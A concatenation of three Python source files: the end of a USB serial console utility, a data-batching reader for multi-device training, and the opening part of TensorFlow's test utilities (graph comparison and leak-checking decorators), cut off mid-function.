Initializes USB stream interface.
Args:
vendor: usb vendor id of device
product: usb product id of device
interface: interface number of device to use
serialname: Defaults to None.
Raises:
SuartError: If init fails
"""
self._done = threading.Event()
self._susb = Susb(vendor=vendor, product=product,
interface=interface, serialname=serialname)
def wait_until_done(self, timeout=None):
return self._done.wait(timeout=timeout)
def run_rx_thread(self):
try:
while True:
try:
r = self._susb._read_ep.read(64, self._susb.TIMEOUT_MS)
if r:
GetBuffer(sys.stdout).write(r.tostring())
GetBuffer(sys.stdout).flush()
except Exception as e:
# If we miss some characters on pty disconnect, that's fine.
# ep.read() also throws USBError on timeout, which we discard.
if not isinstance(e, (OSError, usb.core.USBError)):
print("rx %s" % e)
finally:
self._done.set()
def run_tx_thread(self):
try:
while True:
try:
r = GetBuffer(sys.stdin).read(1)
if not r or r == b"\x03":
break
if r:
self._susb._write_ep.write(array.array('B', r),
self._susb.TIMEOUT_MS)
except Exception as e:
print("tx %s" % e)
finally:
self._done.set()
def run(self):
"""Creates pthreads to poll USB & PTY for data.
"""
self._exit = False
self._rx_thread = threading.Thread(target=self.run_rx_thread)
self._rx_thread.daemon = True
self._rx_thread.start()
self._tx_thread = threading.Thread(target=self.run_tx_thread)
self._tx_thread.daemon = True
self._tx_thread.start()
"""Command line functionality
Allows specifying vid:pid, serialnumber, interface.
Ctrl-C exits.
"""
parser = argparse.ArgumentParser(description="Open a console to a USB device")
parser.add_argument('-d', '--device', type=str,
help="vid:pid of target device", default="18d1:501c")
parser.add_argument('-i', '--interface', type=int,
help="interface number of console", default=0)
parser.add_argument('-s', '--serialno', type=str,
help="serial number of device", default="")
parser.add_argument('-S', '--notty-exit-sleep', type=float, default=0.2,
help="When stdin is *not* a TTY, wait this many seconds after EOF from "
"stdin before exiting, to give time for receiving a reply from the USB "
"device.")
def runconsole():
"""Run the usb console code
Starts the pty thread, and idles until a ^C is caught.
"""
args = parser.parse_args()
vidstr, pidstr = args.device.split(':')
vid = int(vidstr, 16)
pid = int(pidstr, 16)
serialno = args.serialno
interface = args.interface
sobj = Suart(vendor=vid, product=pid, interface=interface,
serialname=serialno)
if sys.stdin.isatty():
tty.setraw(sys.stdin.fileno())
sobj.run()
sobj.wait_until_done()
if not sys.stdin.isatty() and args.notty_exit_sleep > 0:
time.sleep(args.notty_exit_sleep)
def main():
stdin_isatty = sys.stdin.isatty()
if stdin_isatty:
fd = sys.stdin.fileno()
os.system("stty -echo")
old_settings = termios.tcgetattr(fd)
try:
runconsole()
finally:
if stdin_isatty:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
os.system("stty echo")
# Avoid having the user's shell prompt start mid-line after the final output
# from this program.
print()
if __name__ == '__main__':
main()
|
reader.py
|
from . import gpu_dev_count, cpu_dev_count
try:
import queue as Queue
except ImportError:
import Queue
from threading import Thread
dev_count = gpu_dev_count if gpu_dev_count > 0 else cpu_dev_count
def yield_pieces(data, distribute_strategy, batch_size):
"""
Args:
distribute_strategy: support s=split, c=copy, u=unstack,
"""
assert batch_size % dev_count == 0, "batch_size need to be integer times larger than dev_count."
# print('data in yield pieces')
# print(len(data))
assert type(data) == type(distribute_strategy), [type(data), type(distribute_strategy)]
assert len(data) == len(distribute_strategy), [len(data), len(distribute_strategy)]
if isinstance(data, dict):
keys = list(data.keys())
data_list = [data[i] for i in keys]
ds_list = [distribute_strategy[i] for i in keys]
else:
assert isinstance(data, list), "the input data must be a list or dict, and contained with multiple tensors."
data_list = data
ds_list = distribute_strategy
stride = batch_size // dev_count
p = stride
# while p < len(data_list) + stride:
while p <= batch_size:
temp = []
for d, s in zip(data_list, ds_list):
s = s.strip().lower()
if s == 's' or s == 'split':
if p - stride >= len(d):
# print('WARNING: no more examples to feed empty devices')
temp = []
return
temp.append(d[p-stride:p])
elif s == 'u' or s == 'unstack':
assert len(d) <= dev_count, 'Tensor size on dim 0 must be less equal to dev_count when unstack is applied.'
if p//stride > len(d):
# print('WARNING: no more examples to feed empty devices')
return
temp.append(d[p//stride-1])
elif s == 'c' or s == 'copy':
temp.append(d)
else:
raise NotImplementedError()
p += stride
if type(data) == dict:
yield dict(zip(*[keys, temp]))
else:
# print('yielded pieces')
# print(len(temp))
yield temp
def data_feeder(reader, postprocess_fn=None, prefetch_steps=2, phase='train', is_multi=False):
if postprocess_fn is None:
def postprocess_fn(batch, id=-1, phase='train', is_multi=False):
return batch
def worker(reader, dev_count, queue):
dev_batches = []
for index, data in enumerate(reader()):
if len(dev_batches) < dev_count:
dev_batches.append(data)
if len(dev_batches) == dev_count:
queue.put((dev_batches, 0))
dev_batches = []
# For the prediction of the remained batches, pad more batches to
# the number of devices and the padded samples would be removed in
# prediction outputs.
if len(dev_batches) > 0:
num_pad = dev_count - len(dev_batches)
for i in range(len(dev_batches), dev_count):
dev_batches.append(dev_batches[-1])
queue.put((dev_batches, num_pad))
queue.put(None)
queue = Queue.Queue(dev_count*prefetch_steps)
p = Thread(
target=worker, args=(reader, dev_count, queue))
p.daemon = True
p.start()
while True:
ret = queue.get()
queue.task_done()
if ret is not None:
batches, num_pad = ret
if dev_count > 1 and phase == 'train' and is_multi:
id = batches[0]['__task_id'][0]
else:
id = -1
batch_buf = []
flag_buf = []
for idx, batch in enumerate(batches):
# flag = num_pad == 0
flag = idx-len(batches) < -num_pad
# if num_pad > 0:
# num_pad -= 1
batch = postprocess_fn(batch, id, phase, is_multi=is_multi)
# batch = postprocess_fn(batch)
batch_buf.append(batch)
flag_buf.append(flag)
yield batch_buf, flag_buf
else:
break
queue.join()
def decode_fake(nums, mask, bs):
bs //= dev_count
n_t = 0
for flag in mask:
if not flag:
break
n_t = n_t + 1
n_f = len(mask) - n_t
p1 = nums - (n_t-1) * bs
assert p1 % (n_f+1) == 0
each_f = p1 // (n_f+1)
return each_f * n_f
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from collections import OrderedDict
import contextlib
import functools
import gc
import itertools
import math
import os
import random
import re
import tempfile
import threading
import unittest
from absl.testing import parameterized
import numpy as np
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python import tf2
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import tape
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops.ragged import ragged_tensor
from tensorflow.python.ops.ragged import ragged_tensor_value
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import deprecation
from tensorflow.python.util import nest
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
# If the below import is made available through the BUILD rule, then this
# function is overridden and will instead return True and cause Tensorflow
# graphs to be compiled with XLA.
def is_xla_enabled():
return False
try:
from tensorflow.python.framework.is_xla_test_true import is_xla_enabled # pylint: disable=g-import-not-at-top
except:
pass
@tf_export("test.gpu_device_name")
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
@tf_export("test.assert_equal_graph_def", v1=[])
def assert_equal_graph_def_v2(expected, actual):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent. This function
ignores randomized attribute values that may appear in V2 checkpoints.
Args:
expected: The `GraphDef` we expected.
actual: The `GraphDef` we have.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2=True,
hash_table_shared_name=True)
@tf_export(v1=["test.assert_equal_graph_def"])
def assert_equal_graph_def_v1(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
hash_table_shared_name: boolean determining whether to ignore randomized
shared_names that appear in HashTableV2 op defs.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2,
hash_table_shared_name)
def assert_equal_graph_def(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for actual, got %s" %
type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for expected, got %s" %
type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
if hash_table_shared_name:
_strip_hash_table_shared_name(actual)
_strip_hash_table_shared_name(expected)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(
len(a_value.bytes_list.value), len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEquals(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, str(attr_tensor_string_value))):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
_TABLE_SHARED_NAME_PATTERN = r"hash_table_[0-9a-z\-]+"
def _strip_hash_table_shared_name(graph_def):
for node in graph_def.node:
delete_keys = []
if node.op == "HashTableV2" and "shared_name" in node.attr:
if re.match(_TABLE_SHARED_NAME_PATTERN, str(node.attr["shared_name"].s)):
delete_keys.append("shared_name")
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
def IsBuiltWithROCm():
return pywrap_tensorflow.IsBuiltWithROCm()
def GpuSupportsHalfMatMulAndConv():
return pywrap_tensorflow.GpuSupportsHalfMatMulAndConv()
def IsMklEnabled():
return pywrap_tensorflow.IsMklEnabled()
def InstallStackTraceHandler():
pywrap_tensorflow.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
return fn(*args, **kwargs)
return wrapper
return real_skip_if
def enable_c_shapes(fn):
"""No-op. TODO(b/74620627): Remove this."""
return fn
def with_c_shapes(cls):
"""No-op. TODO(b/74620627): Remove this."""
return cls
def enable_control_flow_v2(fn):
"""Decorator for enabling CondV2 and WhileV2 on a test.
Note this enables using CondV2 and WhileV2 after running the test class's
setup/teardown methods.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
enable_control_flow_v2_old = control_flow_util.ENABLE_CONTROL_FLOW_V2
control_flow_util.ENABLE_CONTROL_FLOW_V2 = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util.ENABLE_CONTROL_FLOW_V2 = enable_control_flow_v2_old
return wrapper
def with_control_flow_v2(cls):
"""Adds methods that call original methods with WhileV2 and CondV2 enabled.
Note this enables CondV2 and WhileV2 in new methods after running the test
class's setup method.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
If a test function has _disable_control_flow_v2 attr set to True (using the
@disable_control_flow_v2 decorator), the v2 function is not generated for it.
Example:
@test_util.with_control_flow_v2
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
@test_util.disable_control_flow_v2("b/xyzabc")
def testDisabledForV2(self):
...
Generated class:
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
def testEnabledForV2WithControlFlowV2(self):
// Enable V2 flags.
testEnabledForV2(self)
// Restore V2 flags.
def testDisabledForV2(self):
...
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return cls
for name, value in cls.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix) and
not getattr(value, "_disable_control_flow_v2", False)):
setattr(cls, name + "WithControlFlowV2", enable_control_flow_v2(value))
return cls
def disable_control_flow_v2(unused_msg):
"""Decorator for a function in a with_control_flow_v2 enabled test class.
Blocks the function from being run with v2 control flow ops.
Args:
unused_msg: Reason for disabling.
Returns:
The wrapped function with _disable_control_flow_v2 attr set to True.
"""
def wrapper(func):
func._disable_control_flow_v2 = True
return func
return wrapper
def assert_no_new_pyobjects_executing_eagerly(f):
"""Decorator for asserting that no new Python objects persist after a test.
Runs the test multiple times executing eagerly, first as a warmup and then to
let objects accumulate. The warmup helps ignore caches which do not grow as
the test is run repeatedly.
Useful for checking that there are no missing Py_DECREFs in the C exercised by
a bit of Python.
"""
def decorator(self, **kwargs):
"""Warms up, gets an object count, runs the test, checks for new objects."""
with context.eager_mode():
gc.disable()
# Run the test 2 times as warmup, in an attempt to fill up caches, which
# should not grow as the test is run repeatedly below.
#
# TODO(b/117156879): Running warmup twice is black magic; we have seen
# tests that fail with 1 warmup run, and pass with 2, on various versions
# of python2.7.x.
for _ in range(2):
f(self, **kwargs)
gc.collect()
previous_count = len(gc.get_objects())
if ops.has_default_graph():
collection_sizes_before = {
collection: len(ops.get_collection(collection))
for collection in ops.get_default_graph().collections
}
for _ in range(3):
f(self, **kwargs)
# Note that gc.get_objects misses anything that isn't subject to garbage
# collection (C types). Collections are a common source of leaks, so we
# test for collection sizes explicitly.
if ops.has_default_graph():
for collection_key in ops.get_default_graph().collections:
collection = ops.get_collection(collection_key)
size_before = collection_sizes_before.get(collection_key, 0)
if len(collection) > size_before:
raise AssertionError(
("Collection %s increased in size from "
"%d to %d (current items %s).") %
(collection_key, size_before, len(collection), collection))
# Make sure our collection checks don't show up as leaked memory by
# removing references to temporary variables.
del collection
del collection_key
del size_before
del collection_sizes_before
gc.collect()
# There should be no new Python objects hanging around.
new_count = len(gc.get_objects())
# In some cases (specifacally on MacOS), new_count is somehow
# smaller than previous_count.
# Using plain assert because not all classes using this decorator
# have assertLessEqual
assert new_count <= previous_count, (
"new_count(%d) is not less than or equal to previous_count(%d)" %
(new_count, previous_count))
gc.enable()
return decorator
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensorflow_object(obj):
try:
return isinstance(obj,
(ops.Tensor, variables.Variable,
tensor_shape.Dimension, tensor_shape.TensorShape))
except ReferenceError:
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(
id(obj) for obj in gc.get_objects() if _is_tensorflow_object(obj))
outside_executed_eagerly = context.executing_eagerly()
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the graph key so optimizers behave.
outside_graph_key = ops.get_default_graph()._graph_key
with ops.Graph().as_default():
ops.get_default_graph()._graph_key = outside_graph_key
if outside_executed_eagerly:
with context.eager_mode():
result = f(self, **kwargs)
else:
result = f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
context.context()._clear_caches() # pylint: disable=protected-access
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensorflow_object(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return result
return decorator
def _find_reference_cycle(objects, idx):
def get_ignore_reason(obj, blacklist):
"""Tests whether an object should be omitted from the dependency graph."""
if len(blacklist) > 100:
return "<depth limit>"
if tf_inspect.isframe(obj):
if "test_util.py" in tf_inspect.getframeinfo(obj)[0]:
return "<test code>"
for b in blacklist:
if b is obj:
return "<test code>"
if obj is blacklist:
return "<test code>"
return None
# Note: this function is meant to help with diagnostics. Its output is purely
# a human-readable representation, so you may freely modify it to suit your
# needs.
def describe(obj, blacklist, leaves_only=False):
"""Returns a custom human-readable summary of obj.
Args:
obj: the value to describe.
blacklist: same as blacklist in get_ignore_reason.
leaves_only: boolean flag used when calling describe recursively. Useful
for summarizing collections.
"""
if get_ignore_reason(obj, blacklist):
return "{}{}".format(get_ignore_reason(obj, blacklist), type(obj))
if tf_inspect.isframe(obj):
return "frame: {}".format(tf_inspect.getframeinfo(obj))
elif tf_inspect.ismodule(obj):
return "module: {}".format(obj.__name__)
else:
if leaves_only:
return "{}, {}".format(type(obj), id(obj))
elif isinstance(obj, list):
return "list({}): {}".format(
id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
elif isinstance(obj, tuple):
return "tuple({}): {}".format(
id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
elif isinstance(obj, dict):
return "dict({}): {} keys".format(id(obj), len(obj.keys()))
elif tf_inspect.isfunction(obj):
return "function({}) {}; globals ID: {}".format(
id(obj), obj.__name__, id(obj.__globals__))
else:
return "{}, {}".format(type(obj), id(obj))
def build_ref_graph(obj, graph, reprs, blacklist):
"""Builds a reference graph as <referrer> -> <list of refferents>.
Args:
obj: The object to start from. The graph will be built by recursively
adding its referrers.
graph: Dict holding the graph to be built. To avoid creating extra
references, the graph holds object IDs rather than actual objects.
reprs: Auxiliary structure that maps object IDs to their human-readable
description.
blacklist: List of objects to ignore.
"""
referrers = gc.get_referrers(obj)
blacklist = blacklist + (referrers,)
obj_id = id(obj)
for r in referrers:
if get_ignore_reason(r, blacklist) is None:
r_id = id(r)
if r_id not in graph:
graph[r_id] = []
if obj_id not in graph[r_id]:
graph[r_id].append(obj_id)
build_ref_graph(r, graph, reprs, blacklist)
reprs[r_id] = describe(r, blacklist)
def find_cycle(el, graph, reprs, path):
"""Finds and prints a single cycle in the dependency graph."""
if el not in graph:
return
for r in graph[el]:
if r in path:
logging.error("Reference cycle sample:")
for p in path + (r,):
logging.error(reprs.get(p, "unknown object " + str(p)))
return True
else:
if find_cycle(r, graph, reprs, path + (r,)):
return True
return False
obj = objects[idx]
graph = {} # referrer ID -> object ID
reprs = {} # object ID -> description
build_ref_graph(obj, graph, reprs, (objects, graph, reprs, get_ignore_reason,
describe, build_ref_graph, find_cycle))
for k in graph:
if find_cycle(k, graph, reprs, ()):
return True
return False
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
# Force-load `distribution_strategy_context` to prevent GC at
# test time when using eager. Remove once b/117329403 is resolved.
tape.distribution_strategy_context.get_strategy()
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
result = f(self, **kwargs)
gc.collect()
new_garbage = len(gc.garbage)
if new_garbage > previous_garbage:
logging.error(
"The decorated test created work for Python's garbage collector, "
"likely due to a reference cycle. New objects in cycle(s):")
for i, obj in enumerate(gc.garbage[previous_garbage:]):
try:
logging.error("Object %d of %d", i,
len(gc.garbage) - previous_garbage)
def _safe_object_str(obj):
return "<%s %d>" % (obj.__class__.__name__, id(obj))
logging.error(" Object type: %s", _safe_object_str(obj))
logging.error(
" Referrer types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referrers(obj)]))
logging.error(
" Referent types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referents(obj)]))
logging.error(" Object attribute names: %s", dir(obj))
logging.error(" Object __str__:")
logging.error(obj)
logging.error(" Object __repr__:")
logging.error(repr(obj))
except Exception: # pylint: disable=broad-except
logging.error("(Exception while printing object)")
# When garbage is created, this call can help identify reference cycles,
# which are typically the cause of such garbage.
if new_garbage > previous_garbage:
for i in range(previous_garbage, new_garbage):
if _find_reference_cycle(gc.garbage, i):
break
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, new_garbage)
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return result
return decorator
def _combine_named_parameters(**kwargs):
"""Generate combinations based on its keyword arguments.
Two sets of returned combinations can be concatenated using +. Their product
can be computed using `times()`.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
if not kwargs:
return [OrderedDict()]
sort_by_key = lambda k: k[0][0]
kwargs = OrderedDict(sorted(kwargs.items(), key=sort_by_key))
first = list(kwargs.items())[0]
rest = dict(list(kwargs.items())[1:])
rest_combined = _combine_named_parameters(**rest)
key = first[0]
values = first[1]
if not isinstance(values, list):
values = [values]
combinations = [
OrderedDict(sorted(list(combined.items()) + [(key, v)], key=sort_by_key))
for v in values
for combined in rest_combined
]
return combinations
def generate_combinations_with_testcase_name(**kwargs):
"""Generate combinations based on its keyword arguments using combine().
This function calls combine() and appends a testcase name to the list of
dictionaries returned. The 'testcase_name' key is a required for named
parameterized tests.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
combinations = _combine_named_parameters(**kwargs)
named_combinations = []
for combination in combinations:
assert isinstance(combination, OrderedDict)
name = "".join([
"_{}_{}".format("".join(filter(str.isalnum, key)),
"".join(filter(str.isalnum, str(value))))
for key, value in combination.items()
])
named_combinations.append(
OrderedDict(
list(combination.items()) +
[("testcase_name", "_test{}".format(name))]))
return named_combinations
def run_all_in_graph_and_eager_modes(cls):
"""Execute all test methods in the given class with and without eager."""
base_decorator = run_in_graph_and_eager_modes
for name, value in cls.__dict__.copy().items():
if callable(value) and name.startswith(
unittest.TestLoader.testMethodPrefix) and not (
name.startswith("testSkipEager") or
name.startswith("test_skip_eager") or name == "test_session"):
setattr(cls, name, base_decorator(value))
return cls
def build_as_function_and_v1_graph(func=None):
"""Run a test case in v1 graph mode and inside tf.function in eager mode.
WARNING: This decorator can only be used in test cases that statically checks
generated graph. Attempting to evaluate graph or function results via.
session.run() or self.evaluate() will fail.
WARNING: This decorator can only be used for test cases that inherit from
absl.testing.parameterized.TestCase.
Args:
func: Test case function to be decorated.
Returns:
Decorated test case function.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_mode_and_function` only supports test methods.")
@parameterized.named_parameters(("_v1_graph", "v1_graph"),
("_function", "function"))
@functools.wraps(f)
